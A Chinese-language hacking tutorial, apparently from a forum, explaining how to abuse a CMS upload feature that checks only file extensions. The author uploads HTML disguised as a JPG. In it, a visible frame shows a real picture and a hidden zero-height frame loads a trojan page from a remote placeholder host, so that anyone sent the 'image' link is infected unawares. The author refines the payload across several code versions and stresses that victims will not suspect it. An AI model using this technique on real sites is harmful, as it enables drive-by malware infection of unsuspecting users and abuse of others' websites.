這個漏洞適用于所有只檢查上傳文件格式的程序， 把圖片改成HTML代碼， 上傳后可執行 做轉向， 發現的過程是我今天看了一下某門戶網站的BBS上做了過濾， 上傳失敗， 然后回到主頁上， 發現是動力系統， 于是注冊了一個帳號， 然后到個人管理里， 看到添加文章里面 能上傳、文件， 于是開始想利用的過程。 我開始的構思是直接上傳這樣一個程序。

其實這樣有很大一個漏洞， 別人打開這些JPG網頁后， 圖片顯示不出來， 自然別人就會起疑心， 想到了前段時間的CHM網頁木馬的制作的方法， 變相的利用它應該能達到這樣的效果吧？假如代碼為：

<frameset rows="444,0" cols="*">

<frame src="index.htm" framborder="no" scrolling="auto" noresize

marginwidth="0" margingheight="0">

<frame src="cha.htm"  frameborder="no" scrolling="no"   noresize

marginwidth="0" margingheight="0">

</frameset>

這樣的一個index.htm， 上傳后發現失敗， 直接顯示原代碼。 于是在代碼的開頭結尾加了如下的代碼：

<html>

<frameset rows="444,0" cols="*">

<frame src="index.htm" framborder="no" scrolling="auto" noresize

marginwidth="0" margingheight="0">

<frame src="cha.htm"  frameborder="no" scrolling="no"   noresize

marginwidth="0" margingheight="0">

</frameset></html>

測試后頁面已經成了一個木馬頁面， 但是這個木馬一定要有個CHM的人才行， 網站不可能專門提供你上傳這個類型的文件吧？！于是想到遠程的調用， 后把Index.jpg改為代碼：

<html>

<frameset rows="444,0" cols="*">

<frame src="index.htm" framborder="no" scrolling="auto" noresize

marginwidth="0" margingheight="0">

<frame src="http://www.xxx.com/cha.htm"  frameborder="no"

scrolling="no"   noresize marginwidth="0" margingheight="0">

</frameset></html>

上傳后發現 ， 防火墻成功提示病毒， 但是別人打開這個頁面的時候直接是大紅XX， 有腦子的人都會懷疑。 于是想到把這個頁面打開后看成一個圖片， 接著直接把上面的代碼改成：

<html>

<frameset rows="444,0" cols="*">

<frame src="/UpLoadFiles/NewsPhoto/omasuiai.jpg" framborder="no"

scrolling="auto" noresize marginwidth="0" margingheight="0">

<frame src="http://www.xxx.com/cha.htm"  frameborder="no"

scrolling="no"   noresize marginwidth="0" margingheight="0">

</frameset></html>

這樣打開這個頁面的時候正常顯示圖片， 木馬也能中了！前提是要把這個圖片頁面發給別人， 例如：www.***.com/UpLoadFiles/NewsPhoto/08aXXXXX.jpg， 對方打開后還以為是看到了一張圖片， 其實他已經中木馬了， 再怎么說這個也是上傳的圖片， 而且可以上傳到自己的站里， 不會有人懷疑的！